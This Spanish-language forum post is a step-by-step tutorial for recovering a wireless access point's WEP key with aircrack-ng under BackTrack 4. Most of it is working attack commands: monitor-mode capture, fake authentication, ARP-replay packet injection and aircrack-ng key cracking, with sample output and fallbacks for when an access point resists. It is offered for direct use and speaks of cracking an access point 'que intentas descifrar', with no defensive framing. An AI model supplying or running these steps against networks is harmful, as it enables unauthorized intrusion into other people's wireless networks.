El manual está muy bien, únicamente que lo veo un poco sobrado para algo tan sencillo.
Cuando tenga tiempo , intentaré poner un documento con formato "bonito" con imágnenes para que puedan ver lo que explico aquí de forma escrita.
Para realizar esto, te puedes basar en cualquier distro Linux, que tenga aircrack. Yo recomiendo BackTrack 4
http://www.remote-exploit.org/backtrack_download.htmlPASO 1:
En una terminal pones:
airmon-ng start wifi0
a continuación:
airodump-ng ath1
cuando encuentres tu red wifi ctrl+c para parar la búsqueda y escribes
airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1
donde(no hay que poner corchetes):
[channel] es el canal
[AP MAC] es la dirección mac, XX:XX:XX:XX:XX
[filename] el nombre de archivo que le quieres dar, por ejemplo “WiFi”
PASO 2:
Abre una nueva terminal:
aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] ath1
donde:
[AP SSID] es el nombre del Punto de acceso: Por ejemplo WLANCASA o lo que salga ahi en la primera terminal.
Si te sale esto
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful
Entonces con éxito habrás encontrado el camino hacia la clave,
Si no obtienes esta respuesta, intenta con lo siguiente:
Aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1
Y te debería salir algo como esto:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
Si no obtienes la respuesta con este comando, no podrás crackear la clave, y tendrás que acercarte más al punto de acceso que intentas descifrar o bien, quiere decir, que por mucho que lo intentes, no te permitirá ya que cuenta con algún otro tipo de seguridad.
PASO 3: Inyectar tráfico
aireplay-ng -3 -b [AP MAC] ath1 -x 250
En un par de minutos empezarás a ver como la columna DATA de la primera terminal empieza a subir
Espera hata tener unos 40.000 más o menos y abre una tercera terminal.
PASO 4:
aircrack-ng -z -b [AP MAC] [filename*.cap]
En lo de filename deberias poner lo que te dije antes, en tu caso sería WiFi.cap o como hayas decidido nombrar tu archivo.
Espera un minuto más, y obtendrás la clave del punto de acceso

C Ya n Thanx…!!